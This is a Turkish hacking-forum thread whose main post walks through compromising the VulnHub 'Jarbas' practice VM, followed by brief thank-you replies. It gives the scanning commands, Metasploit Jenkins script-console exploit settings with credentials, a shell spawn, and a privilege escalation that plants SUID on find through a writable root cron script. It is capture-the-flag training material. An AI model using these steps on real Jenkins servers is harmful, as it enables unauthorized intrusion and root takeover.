THT DUYURU

Capture The Flag Vulnerable VM Walkthrough & Capture The Flag Writeup Yazabileceğiniz Bölüm

Seçenekler

Jarbas Zafiyetli Makine Çözümü // Qwx

Qwx
Qwx - ait Kullanıcı Resmi (Avatar)
Yardımsever
Üyelik tarihi:
04/2012
Mesajlar:
2.734
Konular:
116
Teşekkür (Etti):
96
Teşekkür (Aldı):
613
Ticaret:
(0) %
31-12-2018 18:34
#1
Jarbas Zafiyetli Makine Çözümü // Qwx
Jarbas Zafiyetli Makine Çözümü
Jarbas İndirme Linki ;

Kod:
https://www.vulnhub.com/entry/jarbas-1,232/

Makinemizin ilk açılış görüntüsü şu şekildedir.



Makinemizin ilk olarak IP adresini öğrenmek için netdiscover kullanıyoruz.
Kod:
netdiscover




Açık olan portlara bakmak için NMAP taramasını kullanıyoruz.

Kod:
nmap -sS -sV <adress>




IP adresimize giriş yaptığımızda bizi bu şekilde bir sayfa karşılıyor.



Portlarımızı incelediğimiz zaman 22 ve 80 nin dışında ek olarak 8080 portununda açık olduğunu görmekteyiz. Hemen burada ne olduğunu görmek adına giriş sağlıyoruz.



Bir giriş paneli bizi karşılıyor şimdi ilk adımımız bu giriş paneli bilgilerini elde etmek olacaktır. IP Adresindeki tüm içerikleri görmek için DIRB ile bir tarama gerçekleştireceğiz.

Kod:
dirb <adress> -w <wordlistkonumu> -X .txt,.html

Not : DIRB kodunda "<wordlistkonumu>" istediğiniz wordlisti kullanabilirsiniz, DIRB aracını yüklediğiniz zaman otomatik "/usr/share/wordlists/dirb/" bir şekilde buraya wordlistleriniz gelmektedir.
DIRB aramamız tamamlandı.




DIRB taramasından çıkan <adress>/access.html 'i ziyaret ettiğimizde bizde 3 tane şifrelenmiş veri vermektedir. Bu verilerin ne olduğunu çözmek adına bir siteden yardım alacağız.




Çıkan sonuçlarda hepsini teker teker denediğimizde sadece "eder" kullanıcı ismi olan ile giriş sağlayabiliyoruz, giriş yaptıktan sonra Jenkinsa Hoşgeldiniz! şeklinde bizi karşılıyor.



Sırada hangi açıklarımızın olduğunu bulmak olacak ve bunları nasıl sömürebiliriz aslında tam olayın başladığı kısım burası. M.etasploit için exploit adına bir araştırma yapmamız lazım ve "jenkins exploit" diye bir arama yapıyoruz.



Seçili sitedeki modül adını : "exploit/multi/http/jenkins_script_console" alıyoruz ve msf ' ye başlıyoruz.

Kod:
msfconsole

Kod:
 use exploit/multi/http/jenkins_script_console
 set target 1 
 set rhost <adress>
 set rport 8080
 set username eder
 set password vipsu
 set targeturi /
 run

Kod:
shell
 /bin/bash -i
find / -user root -writable -type f -not -path "/proc/*" 2>/dev/null


CleaningScript.sh adında bir script bulduk bu script'i indirip üzerinde değişiklik yapıp tekrar yükleyeceğiz.




Kod:
download CleaningScript.sh




chmod u+s /usr/bin/find komutu ile gerekli izinleri değiştirip root izinlerine sahip olacağız, değişiklikleri yaptıktan sonra tekrar upload ediyoruz.

Kod:
upload CleaningScript.sh


Upload ettikten sonra sadece biraz beklemek gerekiyor. Ardından erişim yükseltmemiz tamamlanacak. Ve bir süre geçtikten sonra artık root kullanıcısı yetkisindeyiz ve flag.txt ' yi arıyoruz.





Ve flag.txt




---------------------
A hacker does for love what others would not do for money.
Rhotav, "Atmaca Teşekkür etti.
"Atmaca - ait Kullanıcı Resmi (Avatar)
Yardımsever
Üyelik tarihi:
12/2017
Nereden:
Atlas'a
Mesajlar:
3.411
Konular:
254
Teşekkür (Etti):
439
Teşekkür (Aldı):
637
Ticaret:
(0) %
31-12-2018 18:53
#2
Ellerine sağlık.
---------------------
λ
cewl - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
06/2017
Nereden:
Merdekan
Yaş:
25
Mesajlar:
2.810
Konular:
184
Teşekkür (Etti):
0
Teşekkür (Aldı):
769
Ticaret:
(0) %
31-12-2018 18:54
#3
elve sagliq (:
Qwx
Qwx - ait Kullanıcı Resmi (Avatar)
Yardımsever
Üyelik tarihi:
04/2012
Mesajlar:
2.734
Konular:
116
Teşekkür (Etti):
96
Teşekkür (Aldı):
613
Ticaret:
(0) %
01-01-2019 00:09
#4
Alıntı:
atmaca7887´isimli üyeden Alıntı Mesajı göster
Ellerine sağlık.


Teşekkür ederim.



Alıntı:
cewl´isimli üyeden Alıntı Mesajı göster
elve sagliq (:

Teşekkür ederim.
---------------------
A hacker does for love what others would not do for money.
InternetGhetto - ait Kullanıcı Resmi (Avatar)
Tamamen Forumdan Uzaklaştırıldı
Üyelik tarihi:
12/2018
Nereden:
Darh Veb
Mesajlar:
134
Konular:
4
Teşekkür (Etti):
0
Teşekkür (Aldı):
99
Ticaret:
(0) %
01-01-2019 00:10
#5
Ellerine Sağlık Hocam.
Veloue Teşekkür etti.
'Creative - ait Kullanıcı Resmi (Avatar)
Green Team
Üyelik tarihi:
03/2017
Mesajlar:
3.135
Konular:
94
Teşekkür (Etti):
222
Teşekkür (Aldı):
1051
Ticaret:
(0) %
04-01-2019 17:58
#6
Elinize Sağlık (:
--------------------- ‘’ Ve Orhan Veli Ceketsiz Öldü.’’


"P4RS - ait Kullanıcı Resmi (Avatar)
Green Team Lideri
Üyelik tarihi:
01/2017
Nereden:
Balkes
Yaş:
18
Mesajlar:
4.549
Konular:
478
Teşekkür (Etti):
1105
Teşekkür (Aldı):
2246
Ticaret:
(0) %
04-01-2019 18:38
#7
Ellerine sağlık.
ByQueny - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
12/2018
Nereden:
Bilinmiyor
Mesajlar:
663
Konular:
16
Teşekkür (Etti):
18
Teşekkür (Aldı):
72
Ticaret:
(0) %
04-01-2019 18:51
#8
eline sağlık
---------------------
Ben Yapmaya Cesaret Edemediğin Herşeyin Vücut Bulmuş Haliyim .

Cyber Security & Defacer
Qwx
Qwx - ait Kullanıcı Resmi (Avatar)
Yardımsever
Üyelik tarihi:
04/2012
Mesajlar:
2.734
Konular:
116
Teşekkür (Etti):
96
Teşekkür (Aldı):
613
Ticaret:
(0) %
04-01-2019 19:27
#9
Alıntı:
THE HACKER 21´isimli üyeden Alıntı Mesajı göster
Elinize Sağlık (:
Teşekkür ederim.

Alıntı:
WhiteRed´isimli üyeden Alıntı Mesajı göster
Ellerine sağlık.
Teşekkür ederim.

Alıntı:
ByQueny´isimli üyeden Alıntı Mesajı göster
eline sağlık
Teşekkür ederim.
---------------------
A hacker does for love what others would not do for money.
King Kong - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
03/2017
Mesajlar:
2.399
Konular:
153
Teşekkür (Etti):
158
Teşekkür (Aldı):
425
Ticaret:
(0) %
04-01-2019 20:01
#10
Efsane Konu Olmuş Neden Rağbet Görmemiş... Ellerine Sağlık Hack İçin Önemli Bir Şey.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler